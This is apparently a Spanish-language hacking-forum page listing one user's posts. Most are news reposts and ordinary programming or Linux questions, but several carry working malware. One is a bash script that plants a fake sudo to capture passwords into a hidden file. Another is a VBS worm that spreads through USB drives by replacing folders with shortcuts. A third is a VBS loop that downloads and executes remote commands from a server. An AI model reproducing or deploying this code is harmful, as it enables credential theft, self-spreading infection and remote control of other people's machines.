Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - daryo

#46
pues eso . Leyendo un poco es sencillo y hay varias formas de saber si se esta sobre wine http://forum.winehq.org/viewtopic.php?p=25906

queria saber si tenia sentido algo asi y que otras cosas se podrian hacer una vez se haya detectado que se esta corriendo sobre el wine

desde mi ignorancia , ya que no conozco mucho sobre el funcionamiento de linux . Lo que haria una vez detectado que esta corriendo sobre wine crear un sudo falso para obtener la clave de root y que luego el sudo que yo hice se encarge de bajar algo y ejecutarlo.

#47
la verdad me impresiono no sabia que html5 tuviera ese potencial, usan el motor babylon.js
demo del motor :
[youtube=640,360]https://www.youtube.com/watch?v=Z1dIZWSdyn4
[/youtube]
aca el juego:
http://race.assassinscreedpirates.com/
#48
en principio funciona bien pero como muestro en la imagen:

el cursor para escribir lo situa muy abajo es como si estubiera poniendo caracteres vacios al final.

edito:
ya lo solucione jeje puse un sizeof y no un strlen asi que enviaba caracteres vacios

#49
Código (asm) [Seleccionar]
.386
.model flat,stdcall
option casemap:none

include     \masm32\include\windows.inc
include     \masm32\include\kernel32.inc
include     \masm32\include\msvcrt.inc

includelib  \masm32\lib\kernel32.lib
includelib  \masm32\lib\msvcrt.lib
includelib  \masm32\lib\windows.lib

system PROTO C, :PTR BYTE

.data

hola1 db "por favor digite un numero:",0
hola2 db "por favor digite otro numero:",0
pedir db "%d",0

menu1 db "escoja 1 para sumar 2 resta 3 multiplicar 4 para dividir",0
command BYTE "echo; & pause",0
limpiar BYTE "cls",0

resultado db "%d",0

.data?
x dd ?
x2 dd ?
x3 dd ?
menu dd ?


.code
start:
invoke system,ADDR limpiar
invoke crt_printf,ADDR hola1
invoke crt_scanf,ADDR pedir,ADDR x

invoke crt_printf,ADDR hola2
invoke crt_scanf,ADDR pedir,ADDR x2

mov eax,x
mov ebx,x2

invoke crt_printf,ADDR menu1
invoke crt_scanf,ADDR pedir,ADDR menu

cmp menu,1
je suma

cmp menu,2
je resta

cmp menu,3
je multiplicacion

cmp menu,4
je division



jmp start
invoke ExitProcess,0

suma:
add eax,ebx
invoke crt_printf,ADDR resultado,eax
invoke system,ADDR command
jmp start


resta:
SUB eax,ebx
invoke crt_printf,ADDR resultado,eax
invoke system,ADDR command
jmp start

multiplicacion:
mul ebx
invoke crt_printf,ADDR resultado,eax
invoke system,ADDR command
jmp start

division:
sub edx,edx
div ebx
invoke crt_printf,ADDR resultado,eax
invoke system,ADDR command
jmp start


end start
#50
acabo de aprender sobre como hacer esto y hasta ahora conozco dos usos:
-saltar firewall
-bypass uac

pero que mas se puede hacer :P
#51
Citar
Ecuador prepara "una demanda colectiva" de los afectados por las hipotecas en España


El embajador de Ecuador en España, Miguel Calahorrano, ha informado este viernes de que la Embajada está "estudiando una demanda colectiva" para presentar ante el Tribunal de Estrasburgo con los casos de varios ecuatorianos residentes en España afectados por las cláusulas abusivas de las hipotecas.

"Estamos estudiando una demanda colectiva para presentar ante el Tribunal de Estrasburgo", ha indicado Calahorrano desde Alicante en declaraciones al portal de noticias Notimérica, editado por Europa Press.

Hace más de un año que la Defensoría de Ecuador presentó ante este mismo organismo una demanda estratégica del ecuatoriano residente en España Luis Solórzano de la que todavía no se ha obtenido respuesta.

Las razones de la demanda

El embajador ha explicado que recientemente "se ha incrementado la atención de los abogados" que asisten gratuitamente a los ecuatorianos que no pueden hacer frente al pago de hipotecas a los bancos y se han abierto nuevas sedes para la asistencia y el acompañamiento de abogados para los ciudadanos que tengan problemas con sus hipotecas en Alicante, Pamplona, Sevilla y Málaga.

Los nuevos centros, que se suman a los ya existentes en Barcelona, Murcia, Madrid y Valencia, continuarán con una labor que ya ha asistido a 18.500 ecuatorianos y que ha logrado 550 daciones en pago y alquileres sociales hasta la fecha.

"Los bancos acosan a las familias. Les mandan cartas, les llaman, aparecen en su casa... El hecho de que cuenten con un abogado que les acompañe ya es todo un éxito", ha comentado el embajador.

Promovida por Rafael Correa


Asimismo, Calahorrano ha destacado que la crisis ha afectado a los españoles, pero que todavía "ha golpeado más a los compatriotas ecuatorianos".

El embajador ha remarcado que esta asistencia ha sido sólo promovida por el Gobierno de Rafael Correa, aunque ha agradecido la colaboración de las asociaciones españolas de afectados por la hipoteca, quienes han ayudado también a los ecuatorianos.

Leer más:  Ecuador prepara "una demanda colectiva" de los afectados por las hipotecas en España - eleconomistaamerica.com
http://www.eleconomistaamerica.com/ecuador-eAm/noticias/5879574/06/14/Ecuador-prepara-una-demanda-colectiva-de-los-afectados-por-las-hipotecas-en-Espana.html#Kku8y9X6xuXaijMy
#52
Citar
Por qué los antivirus están en crisis y cómo pueden salir de ella

Los antivirus están en crisis. Hay quien los da por muertos. Yo creo que pueden sobrevivir, pero antes tienen que cambiar. Te explico por qué.

Brian Dye, vicepresidente de Symantec, ha sido muy claro: los antivirus se han vuelto obsoletos y están condenados a la extinción. Según sus cálculos, solo capturan un 45% de los peligros actuales. Y uno de los creadores de Norton, Ted Schlein, ha tildado a los antivirus como "necesarios pero insuficientes".

¿Cuál es la moraleja en todo este asunto? Podemos deducirla a partir de cuatro hechos que definen el estado de la seguridad informática en el hogar. Vistos en conjunto, te ayudarán a comprender qué está pasando con los antivirus y hacia dónde hay que mirar para proteger tus datos en el futuro.
Los antivirus son incapaces de detectar peligros actuales

Primer hecho: los antivirus ya no sirven porque el problema que resuelven ya no está ahí. Según un estudio de FireEye, el 82% del malware desaparece por completo al cabo de una hora. El 70% solo existe una vez. Los enormes archivos de firmas de los antivirus son cementerios de malware que jamás te afectará

Para frenar su declive, los antivirus han engordado

Segundo hecho: los antivirus se han convertido en suites monstruosas y lentas. A lo largo de los años han ido añadiendo a sus ventanas una plétora de funciones de seguridad adicionales, como copias de seguridad o destructores de archivos. Son herramientas útiles, pero no tienen nada que ver con la protección anti-malware. Son una distracción.

Antivirus portátiles y ligeros, como Avira PC Cleaner, recuperan el espíritu del pasado

Esta táctica, la de engordar aplicaciones, le ha servido a los autores de antivirus para ganar tiempo ante un final inevitable. Pero incluso con un montón de herramientas extra, los antivirus no convencen a los usuarios, que se han dado cuenta de lo poco útiles que se han vuelto los antivirus ante las crisis de seguridad actuales.

Y es que los ataques se han vuelto más sofisticados

Tercer hecho: ahora ya no guardas tus datos bajo el colchón de tu ordenador, sino en uno de los muchos bancos en la nube, como Google o Dropbox. Los criminales solo pueden dañarte de dos maneras: "atracando" los bancos de datos o engañándote para que les des la clave de acceso a tus ahorros digitales, tus datos.

La integración antivirus-navegador es una estrategia inteligente que está aplicando Avast

La mayoría de ataques suceden al navegar. El malware se hace pasar por páginas web legítimas o se incrusta en ellas de forma sigilosa. A veces aprovecha vulnerabilidades espectaculares. Es muy poco lo que tú puedes hacer con tu antivirus, pero es mucho lo que pueden hacer tus webs favoritas, como reforzar sus servidores y controlar las intrusiones.


La mayor competencia de los antivirus son los navegadores
Cuarto hecho: el navegador te protege más que un antivirus. Ahí está por ejemplo Chrome, que inició un experimento de ocultación de direcciones. Al ocultar la dirección, Chrome le quita a los criminales un cebo muy empleado con la finalidad de robar datos (phishing). Sin en ese cebo, es más difícil que caigas en la trampa.

La versión experimental de Chrome, Canary, oculta la dirección casi por completo (fuente)

La nube -Google, Facebook, Yahoo!- filtra por nosotros virus y spam, y protege nuestros datos. En el PC, el riesgo que queda es más sutil, y contra él solo vale un arma: el sentido común. Un antivirus, como un policía, te protege contra agresiones obvias, pero no evitará que te engañen por el simple hecho de que no puede estar en tu cabeza
.
articulo completo: http://articulos.softonic.com/muerte-de-los-antivirus
#53
solo dura 6 mins y es muy interesante

[youtube=640,360]http://www.youtube.com/watch?v=qxJMbQBB-ng[/youtube]
#54
eso que opinan uso  winsock? , PUT de http con MSXML2.XMLHTTP, mm no se alguna idea? gracias  ;D
#55
tuve un pequeño problema con la cache de internet explorer pero ya esta solucionado  :D.
la ubicacion del script debe cambiarse en http://127.0.0.1/?l= por http:/direccion/?l=
Código (vb) [Seleccionar]
Function anticache() ' al parecer usa la cache de internet explorer , de esta forma hago se actualize
anticache=day(date())&Month(Date())&Year(date())&Hour(time())&Minute(Time())&Second(Time()) &Rnd ' en una sola cadena mete el dia,mes,año,hora,minuto,segundos y un numero aleatorio
End Function

Function supertest() ' esta funcion descarga el script
dim resultado,magik,daryo
set magik=CreateObject("MSXML2.XMLHTTP")
magik.open "GET" , "http://127.0.0.1/?l=" & anticache ,false  
magik.send
supertest = magik.ResponseText
End Function

dim prueba1,prueba2,x ' pude usar un array pero asi tambien funciona xD
x=1
while true
if x= 1 Then
prueba1=supertest ' descarga el contenido de la web , que debe ser un script en vbs y lo mete en la variable prueba1
x=0
else
prueba2=supertest
x=1
End If
if not(prueba1 = prueba2) then ' esto determina si el comando ha cambiado desde la ultima vez que lo ejecuto
On ERROR Resume Next
Execute(supertest) ' ejecuta la cadena supertest
End IF
Wscript.sleep 700 ' no quiero sobrecargar el servidor

wend
#56
Scripting / [vbs][source] spread usb
25 Abril 2014, 00:43 AM
hace lo siguiente :
oculta todas las carpetas y crea accesos directos de las carpetas , cuando  abren una carpeta o acceso directo . primero ejecuta el archivo vbs y luego abre la direccion de la carpeta
Código (vb) [Seleccionar]
Set objfso = createobject("scripting.filesystemobject")
Set RainbowDash = createobject("Scripting.FileSystemObject")
Set discos = objfso.drives 'obtenemos la coleccion de discos
if Wscript.Arguments.count > 0 Then
ejecucion Wscript.Arguments(0)
else
For each d in discos 'por cada disco(d) en la coleccion(discos)
'mensaje con la letra de disco
if d.drivetype = 1 Then
Dim subfg,destino
subfg=d.driveletter & ":\"
destino="" & subfg & "wlok.vbs"
if not(RainbowDash.FileExists(destino)) Then
objfso.copyfile WSCript.ScriptFullName,destino,true
set archivo=objfso.getfile(destino)
archivo.attributes=39
Set micarpeta = objfso.getfolder(subfg)
Set subcarpetas = micarpeta.subfolders
For each s in subcarpetas
destino="" & subfg & "wlok.vbs"
accesdirect s.name,subfg,destino
oculto s.name,subfg
Next
End if
End if
Next
End If

Function accesdirect(directorio,disco,destino)
DIM muaja,acce,directiorio1,argumento
directorio1= disco & directorio & ".lnk"
argumento="""" & directorio & """"
set muaja=WScript.CreateObject("Wscript.Shell")
set acces=muaja.CreateShortcut(directorio1)
With acces
.TargetPath = destino
.Arguments = argumento
.WindowStyle = 1
.IconLocation="C:\windows\System32\SHELL32.dll,3"
.WindowStyle="1"
.WorkingDirectory=disco
.save
End With
End Function

Function oculto(directorio,disco)
set carpetaoculta= objfso.getfolder(disco & directorio)
carpetaoculta.attributes=39
End Function

Function ejecucion(parametros)
parametros="""" & parametros & """"
set correr=WScript.CreateObject("Wscript.Shell")
correr.run "explorer.exe " & parametros
payload
End Function

Function payload()
msgbox("payload")
End Function
#57
@madantrax o dire sus codigos me motivo a programar en vbs pero queria saberi si aun se le sigue dando soporte

muchas gracias


Citardaryo, Eleкtro, Darhius, dainodaibouken, DonVidela (+ 1 Oculto(s)) y 2 Visitantes están viendo este tema.
porque tanta gente o_o
#58
quiero instalar archi linux pero en caso de que algo salga mal poder tener mi linux mint como estaba , alguna idea?

gracias de antemano.  ;D
#59
Citar
La desaparición de la capa de hielo del Ártico
Las predicciones  para mediados del presente siglo respecto a un Ártico cada vez más desprovisto de hielo, a estallidos inmensos de gas metano desencadenando tsunamis en el Atlántico Norte y a niveles marinos creciendo varios metros por todo el planeta, nos siguen aún pareciendo cosas de ciencia-ficción.

Pero para un número cada vez mayor de científicos que estudian las Alteraciones Antropogénicas del Clima (ACD, por sus siglas en ingles, es decir, el cambio climático), estos dramáticos pronósticos son posibilidades muy reales en un futuro no tan lejano a causa de la desaparición de la capa de hielo del Ártico, que sigue disminuyendo velozmente tanto en volumen como en extensión. Los científicos que están investigando la situación del hielo en el Ártico están prediciendo que no habrá hielo marino durante los veranos del próximo par de años, e incluso los investigadores de la Marina estadounidense han vaticinado un Ártico sin hielo en 2016. Cualquiera que sea el año en que comience el fenómeno, será la primera vez que los seres humanos existan sobre la Tierra sin que el mar de hielo dure en el Ártico todo el año, y los científicos advierten que esto se producirá cuando el "abrupto cambio climático" supere un punto de no retorno.

Para ampliar información sobre la alteración antropomórfica del clima y cómo los diversos medios ambientes y comunidades sufren a causa de la búsqueda de beneficios de las corporaciones, haga clic aquí.

"El primer año que esto suceda, el estado de aguas abiertas [sin hielo marino] del Océano Ártico durará sólo de unas pocas semanas a un mes", dijo a Truthout Paul Beckwith, profesor de climatología y meteorología en la Universidad de Ottawa, Canadá. "Uno o dos años después, la duración de las aguas abiertas durará varios meses, y una década más o menos después, es probable que la retroalimentación positiva vacíe de hielo la cuenca del Océano Ártico durante la mayor parte del año".

Beckwith, que es ingeniero y físico, está también investigando el cambio climático abrupto tanto en el momento actual como en los paleoregistros del pasado más lejano, advierte que la pérdida del hielo del Ártico creará una situación que "supondrá un planeta muy distinto, con una temperatura media global mucho más alta, hasta 5 o 6 grados centígrados más en pocas décadas, en el cual la nieve y el hielo serán muy raros en el hemisferio norte o incluso desaparecerán durante todo el año".

El Panel Intergubernamental sobre el Cambio Climático de las Naciones Unidas (IPCC, por sus siglas en inglés), la voz más autorizada del mundo en ciencia climática y cuyos informes influyen en las decisiones políticas y planificaciones de los gobiernos nacionales de todo el mundo, acaba de publicar su último informe. El IPCC ha sido acusado por gran parte de la comunidad científica de haber adoptado un sesgo marcadamente conservador.

Scientific American ha dicho del IPCC: "A través de dos décadas y miles de páginas de informes, la voz más autorizada del mundo en el cambio climático ha venido subestimando constantemente el ritmo e intensidad del cambio climático y el peligro que esos impactos representan".

No obstante, el recién publicado informe del IPCC está provocando asombro: Incluso esta conservadora institución está prediciendo graves amenazas para las personas y otras especies en el futuro próximo, y esos riesgos pueden muy bien significar "cambios drásticos o abruptos" que podrían llevar a cambios climáticos imparables e irreversibles, como el deshielo tanto de la capa de hielo del Ártico como del hielo de los glaciares de Groenlandia".

Según el informe del IPCC, el oso polar no es el único que está amenazado.

"El oso polar somos nosotros", dice Patricia Romero Lankao, del National Center for Atmospheric Research, financiado a nivel federal y que se ubica en Boulder, Colorado, al referirse a las primeras especies amenazadas en entrar en la lista debido al calentamiento global que causa el derretimiento del hielo marino.

Beckwith, que cree que el planeta está ya en las primeras fases de un abrupto ACD, ofreció graves predicciones de lo que podíamos esperar como consecuencia de la pérdida del hielo del Ártico.
noticia completa:
http://www.truth-out.org/news/item/22790-the-vanishing-arctic-ice-cap
http://www.rebelion.org/noticia.php?id=182868&titular=la-desaparici%F3n-de-la-capa-de-hielo-del-%E1rtico-(traduccion)
#60
GNU/Linux / telegram por consola en linux
24 Febrero 2014, 00:38 AM

telegram es una excelente alternativa a whatsapp , es mucho mas seguro,ligero, software libre y cada dia gana mas popularidad , a diferencia de whatsupp no necesitamos un smartphone para poderlo usar, se puede usar desde un computador o una interfaz web(webogram), incluso consola que es lo que trato aca. :)


primero instalamos las dependencias:
Código (bash) [Seleccionar]
sudo apt-get install libreadline-dev libconfig-dev libssl-dev lua5.2 liblua5.2-dev git

luego descargamos el codigo de fuente:
Código (bash) [Seleccionar]
git clone https://github.com/vysheng/tg.git && cd tg

ahora dentro de la carpeta tg descargamos de descomprimimos el siguiente archivo
Código (bash) [Seleccionar]
wget https://github.com/vysheng/tg/archive/master.zip -O tg-master.zip


Código (bash) [Seleccionar]
unzip tg-master.zip

listo ahora el proceso de compilacion:
Código (bash) [Seleccionar]
./configure
Código (bash) [Seleccionar]
make

si no hay errores lo ejecutamos
Código (bash) [Seleccionar]
./telegram -k tg.pub

nos pedira nuestro celular
se pone el numero antecedido por un +
Código (bash) [Seleccionar]
+[codigo del pais][numero]

nos enviara un mensaje sms con el codigo .

para ver los comandos se presiona TAB dos veces

entre los comandos basicos estan:

agregar contactos

Código (bash) [Seleccionar]
add_contact <numero> <nombre> <apellido>

muestra los la lista de usuarios como su id.
Código (bash) [Seleccionar]
contact_list

chatear con
Código (bash) [Seleccionar]
chat_with_peer <nombre de usuarios>

fin.
#61
el problema es el siguiente
si tengo una cadena como esta
Código (python) [Seleccionar]
n=":hola soy-una cadena : con : je"

al intentar usar exp regulares diciendole que capture todo lo que esta entre los ":"

Código (python) [Seleccionar]
re.match(":(.+):",n)  

la salida es:
Código (python) [Seleccionar]
hola soy-una cadena : con

lo que quiero es:
Código (python) [Seleccionar]
hola soy-una cadena
que puedo hacer?
#62
acabo de comprarla y tiene :
-micro sd kingston sdc4 16 gb
-cargador miniusb 5v-700mA
-cable rca de video
-conectado al router por ethernet
-NOOBS en la sd


lo conecto y da hasta ip  ,todos los leds prenden , pero no da video y no tengo un tv o pantalla que use hdmi , que puedo hacer?

muchas gracias  :D
#63
ya se que no es una idea muy novedosa pero bueno esta es mi version xD (es que no tenia internet  :laugh: )

la idea es simple cuando se ejecute este bash crea un sudo falso que al escribir alguien sudo comando y ponga su clave. nos pondra la clave en un archivo que esta en la carpeta de usuario .mozilla2 y se borrara el sudo falso :) .


Código (bash) [Seleccionar]
#!/bin/bash

#escribe el archivo que reemplazara el sudo original para obtener la clave
function falsosudo()
{
cat > "sudo" << EOL
#!/bin/bash
#sale cuando se pone mal el comando o se pide la ayuda
function ayuda1()
{
echo "usage: sudo [-D level] -h | -K | -k | -V
usage: sudo -v [-AknS] [-D level] [-g groupname|#gid] [-p prompt] [-u user
           name|#uid]
usage: sudo -l[l] [-AknS] [-D level] [-g groupname|#gid] [-p prompt] [-U user
           name] [-u user name|#uid] [-g groupname|#gid] [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C fd] [-D level] [-g
           groupname|#gid] [-p prompt] [-u user name|#uid] [-g groupname|#gid]
           [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C fd] [-D level] [-g
           groupname|#gid] [-p prompt] [-u user name|#uid] file ...
"
}

function ayuda2()
{
#sale cuando se pide la ayuda junto con ayuda1
echo "

Options:
 -a type       use specified BSD authentication type
 -b            run command in the background
 -C fd         close all file descriptors >= fd
 -E            preserve user environment when executing command
 -e            edit files instead of running a command
 -g group      execute command as the specified group
 -H            set HOME variable to target user's home dir.
 -h            display help message and exit
 -i [command]  run a login shell as target user
 -K            remove timestamp file completely
 -k            invalidate timestamp file
 -l[l] command list user's available commands
 -n            non-interactive mode, will not prompt user
 -P            preserve group vector instead of setting to target's
 -p prompt     use specified password prompt
 -r role       create SELinux security context with specified role
 -S            read password from standard input
 -s [command]  run a shell as target user
 -t type       create SELinux security context with specified role
 -U user       when listing, list specified user's privileges
 -u user       run command (or edit file) as specified user
 -V            display version information and exit
 -v            update user's timestamp without running a command
 --            stop processing command line arguments
"
}
# si no hay parametros muestra la ayuda
if [ "\$#" -eq 0 ];
then
ayuda1
#si se pide ayuda pero hay mas parametros
elif [ "\$#" -ne 1 ] && [ "\$1" == "-h" ];
then
ayuda1

#si se pide ayuda
elif [ "\$#" -eq 1 ] && [ "\$1" == "-h" ];
then
ayuda1
ayuda2


#si no captura la clave
else
#esto es para que no muestre la clave por pantalla
STTY_SAVE=\`stty -g\`
stty -echo
#se pide la contraseña y se guarga en la variable clave
echo -n "[sudo] password for \$USERNAME: "
read clave
#se pone por defecto para que mueste de nuevo lo que se escribe en el teclado
stty \$STTY_SAVE
#error falso que dice que la clave es incorrecta
echo -e "\nSorry, try again."
sleep 3
#guarda el usuario y contraseña
echo "\$USERNAME">>$HOME/.mozilla2/config
echo "\$clave" >> $HOME/.mozilla2/config
#ejecuta el sudo real
/usr/bin/sudo \$*
#se borra solo
rm \$0
fi
EOL
#aca finaliza el archivo
}
#si no existe la ubicacion entonces:
if [ ! -d "$HOME/.mozilla2/" ];
then
# usar clave una ves conseguida :D
#echo <clave> | sudo -S <comando> || echo error
cd "$HOME"
mkdir .mozilla2
#creo el archivo bashrc aca se configura nuestra consola. donde agrego la ruta del sudo falso
echo 'export PATH="$HOME/.mozilla2:$PATH"' >> .bashrc
cd .mozilla2
#creo el sudo
falsosudo
#le doy permisos de ejecucion
chmod +x sudo
fi
#rm $0
#64
http://www.nytimes.com/1990/06/10/world/cia-tie-reported-in-mandela-arrest.html
:rolleyes:


Citar
C.I.A. Vinculado al arresto de mandela

Por DAVID JOHNSTON , Especial para The New York Times
Publicado: 10 de junio 1990


La Agencia Central de Inteligencia desempeñó un papel importante en el arresto en 1962 de Nelson Mandela , líder del Congreso Nacional Africano que fue encarcelado por casi 28 años antes de su lanzamiento hace cuatro meses , según un informe de prensa.

El servicio de inteligencia , el uso de un agente dentro del Congreso Nacional Africano , a condición de funcionarios de seguridad de Sudáfrica , con información precisa sobre las actividades del Sr. Mandela que permitieron a la policía a arrestarlo , dijo la cuenta por el Servicio de Noticias de Cox.

El informe, que será publicado el domingo, citando a un funcionario jubilado no identificado que dijo que un alto nivel de la CIA oficial le dijo poco después de la detención del Sr. Mandela : '' Hemos convertido Mandela a la rama de Seguridad de Sudáfrica . Les dimos todos los detalles, lo que estaría usando , la hora del día , justo donde él sería '' .

Marcos Mansfield , portavoz de la agencia , se negó a comentar sobre el informe de prensa - servicio. '' Como cuestión de política , no hablamos de las denuncias de las actividades de inteligencia '', dijo .

La protección de la Regla de Pretoria


Los informes de que la inteligencia estadounidense avisó a los funcionarios sudafricanos que detuvieron al señor Mandela han circulado durante años . Newsweek informó en febrero de que se creía que la agencia se han involucrado .

El Sr. Mandela tiene previsto visitar los Estados Unidos a partir del 20 de junio para una gira de cinco ciudades que incluirá conversaciones con el presidente Bush y un discurso ante una sesión conjunta del Congreso.

La nota de prensa de servicio , dijo que en el momento de la detención del Sr. Mandela , en agosto de 1962, la CIA dedicado más recursos a la penetración de las actividades de los grupos nacionalistas como el Congreso Nacional Africano que hizo el servicio de seguridad del entonces-novato de Sudáfrica.

La cuenta , dijo la agencia de inteligencia estadounidense estaba dispuesto a ayudar en la aprehensión del señor Mandela porque le preocupaba que un movimiento nacionalista amenazó con una exitosa gobierno sudafricano amistoso. La expansión de este tipo de movimientos fuera de las fronteras de Sudáfrica , la agencia temía , pondría en peligro la estabilidad de otros países africanos , dijo que la cuenta.

Arresto en un retén

Un funcionario de inteligencia sudafricano retirado, Gerard Ludi , fue citado en el informe como diciendo que en el momento de la captura del Sr. Mandela , la CIA había puesto a un agente encubierto en el círculo interno del grupo del Congreso Nacional Africano en Durban.

Ese agente presta el servicio de inteligencia con las cuentas detalladas de las actividades de la organización, incluida la información sobre el paradero del señor Mandela , entonces se busca como un fugitivo por sus actividades contra el apartheid .

La mañana después de una cena secreta con otros miembros del congreso en Durban , el Sr. Mandela , vestido como un chofer, topó con un retén . Fue reconocido y arrestado de inmediato.

El funcionario dijo que se retiró debido a la preocupación sobre la propiedad de las acciones de la CIA en el caso de Mandela , '' las autoridades superiores '' requiere que el Departamento de Estado apruebe las operaciones similares en el futuro . El informe dijo que el Departamento de Estado se negó por lo menos en tres ocasiones para permitir que la agencia para proporcionar funcionarios sudafricanos con información sobre otros disidentes .
#65


¿Cómo genera dinero el software libre?

En primer lugar, me gustaría diferenciar el software libre del software gratis: El software libre es aquel que nos permite usarlo con cualquier propósito, estudiar su funcionamiento, crear copias y mejorarlo. Habitualmente es software gratuito, pero no es un requisito obligatorio.


El software propietario se financia a través de la concesión de licencias. El software libre, en cambio, suele utilizar un modelo de negocio basado en servicios adicionales sobre el software que ofrece. Si la mayoría del software libre es gratuito es difícil imaginar cómo pueden mantenerse proyectos con un trabajo de gestión, desarrollo y calidad final enorme como OpenOffice, eMule, Ubuntu, MySQL, Apache... Vamos a ver los puntos clave del software libre y cómo pueden llegar a ganar bastante dinero.



Comunidad de desarrollo


En prácticamente todos los desarrollos de software libre hay una gran comunidad de desarrolladores que aportan su experiencia y su tiempo de manera desinteresada simplemente por el hecho de aportar valor a la sociedad: programadores, traductores, probadores, diseñadores... Todo el mundo puede aportar algo. Gran parte de la evolución del software libre se ha realizado gracias a ellos. Ejemplos de comunidades los podemos encontrar en OpenOffice, Ubuntu, Debian e incluso hay proyectos que se sustentan casi al 100% por comunidades como Gimp.

Donaciones


Una opción muy habitual en proyectos de software libre es la de donar dinero al proyecto ya que su mantenimiento (servidores, tiempo...) tiene un coste y es lógico que éste se reparta entre todos los que se benefician del proyecto. Esta opción tiene poca repercusión en España -donde no funciona- aunque se utiliza bastante en Estados Unidos. El dinero ganado mediante donaciones habitualmente cubre los costes básicos para mantener el proyecto y poco más. Es habitual que se utilice en conjunto con otros modelos que veremos a continuación. Es utilizado por una gran parte de proyectos de software libre: eMule, jzip, Apache, 7 Zip, Debian. El caso de Ubuntu es singular, un multimillonario dedicado a negocios en Internet donará dinero al proyecto hasta dentro de 3-5 años, cuando calculan que será viable.

Patrocinios


El software libre puede llegar a ser muy popular y contar con un gran número de usuarios fieles. Las ventajas ya las hemos comentado: es software de calidad y habitualmente gratuito. Eso es una gran ocasión para que las empresas incluyan su marca dentro del software y consigan mucha visibilidad, y por eso están dispuestas a pagar mucho dinero. El problema es que el fallo de un patrocinador podría llevar a la quiebra al proyecto. Como ejemplos podemos citar a Firefox, donde Mozilla Corporation generó más de 66 millones de dólares sólo en 2006 gracias al patrocinio de Google (Firefox incorpora Google como buscador principal). O también de KDE, GNOME y OsCommerce, que incorpora plugins de empresas que ofrecen servicios relacionados con el comercio electrónico.

Servicios y soporte técnico

Cualquier aplicación necesita soporte técnico, personalizaciones, instalación, formación para usarla... y quién mejor para ofrecerlo que los propios desarrolladores. Es uno de los modelos más viables ya que hay mucha demanda de servicios adicionales por parte de las empresas que utilizan software libre y además al haber múltiples clientes se minimiza el riesgo de quebrar si falla un patrocinador. Así se financia, EyeOS, MySQL, Red Hat.

Otros

Pueden haber tantos métodos como se le ocurra a cada desarrollador; pero éstos son los más habituales. Otras formas menos habituales sería hacer merchandising, como el que puedes encontrar en la tienda de eMule.

¿Está bien que el software libre genere dinero?


Yo creo que sí. El desarrollo de un proyecto es complejo, y es lógico que se busque la forma de financiar el gasto que supone y el tiempo invertido. La filosofía del software libre no es la de "todo gratis", es la de evitar restricciones que no permiten que los usuarios del software puedan personalizarlo a sus necesidades, compartirlo o solucionar errores.

Que haya negocio detrás del software libre es imprescindible para que las grandes empresas se fijen en él y evolucione como lo está haciendo hoy en día. El desarrollo de grandes proyectos tiene un coste elevado, y alguien tiene que pagarlo. Si sólo existiera el modelo de donaciones, proyectos como OpenOffice o Firefox seguramente no serían lo que son, y si no existiera ni tan siquiera ese modelo no existirían alternativas a las aplicaciones de código cerrado."

En lo que a mí respecta, estoy deacuerdo con el hecho de que el software libre genere ganancias, los desarrolladores, traductores y todos los que tienen que ver con la implementación del mismo no viven del aire, y es gracias a ellos que disfrutamos de un mundo virtual "libre".

Saludos y espero que todos sus comentarios sean constructivos.
http://www.taringa.net/posts/linux/6231388/Como-genera-dinero-el-software-libre.html
#66
he tenido algunas problemas en code blocks y los resources y por eso no lo he habia acabado   :D

ejecutable - actualizado
bajar
imagen:


resource.rc

#include "resource.h"

IDB_BALL                BITMAP  DISCARDABLE     "ball.bmp"
IDR_Tortura             WAVE "g.wav"



resource.h

#define IDB_BALL                        101
#define IDR_Tortura                     1


main.cpp

 #include <windows.h>
   #include "resource.h"


   /*  Declare Windows procedure  */



   DWORD WINAPI sonar(LPVOID lpParameter)
   {
       PlaySound(MAKEINTRESOURCE(IDR_Tortura),GetModuleHandle(NULL),SND_RESOURCE);
       return 0;
   }
   HINSTANCE miinstance;

   LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

   /*  Make the class name into a global variable  */
   char szClassName[ ] = "aAdm";

   int WINAPI WinMain (HINSTANCE hThisInstance,
                       HINSTANCE hPrevInstance,
                       LPSTR lpszArgument,
                       int nCmdShow)
   {
      HWND hwnd;               /* This is the handle for our window */
      MSG messages;            /* Here messages to the application are saved */
      WNDCLASSEX wincl;        /* Data structure for the windowclass */

      /* The Window structure */
      wincl.hInstance = hThisInstance;
      wincl.lpszClassName = szClassName;
      wincl.lpfnWndProc = WindowProcedure;      /* This function is called by windows */
      wincl.style = CS_DBLCLKS;                 /* Catch double-clicks */
      wincl.cbSize = sizeof (WNDCLASSEX);

      /* Use default icon and mouse-pointer */
      wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
      wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
      wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
      wincl.lpszMenuName = NULL;                 /* No menu */
      wincl.cbClsExtra = 0;                      /* No extra bytes after the window class */
      wincl.cbWndExtra = 0;                      /* structure or the window instance */
      /* Use Windows's default colour as the background of the window */
      wincl.hbrBackground = CreateSolidBrush( RGB(0x00, 0x00, 0x00) );

      /* Register the window class, and if it fails quit the program */
      if (!RegisterClassEx (&wincl))
          return 0;

      /* The class is registered, let's create the program*/
      hwnd = CreateWindowEx (
             0,                   /* Extended possibilites for variation */
             szClassName,         /* Classname */
             "zfa",       /* Title Text */
             WS_POPUP, /* default window */
             CW_USEDEFAULT,       /* Windows decides the position */
             CW_USEDEFAULT,       /* where the window ends up on the screen */
             544,                 /* The programs width */
             375,                 /* and height in pixels */
             HWND_DESKTOP,        /* The window is a child-window to desktop */
             NULL,                /* No menu */
             hThisInstance,       /* Program Instance handler */
             NULL                 /* No Window Creation data */
             );

      /* Make the window visible on the screen */
       ShowWindow(hwnd, SW_SHOWMAXIMIZED);
      ShowCursor(FALSE);
   UpdateWindow(hwnd);
      /* Run the message loop. It will run until GetMessage() returns 0 */
      while (GetMessage (&messages, NULL, 0, 0))
      {
          /* Translate virtual-key messages into character messages */
          TranslateMessage(&messages);
          /* Send message to WindowProcedure */
          DispatchMessage(&messages);
      }

      /* The program return-value is 0 - The value that PostQuitMessage() gave */
      return messages.wParam;
   }


   /*  This function is called by the Windows function DispatchMessage()  */
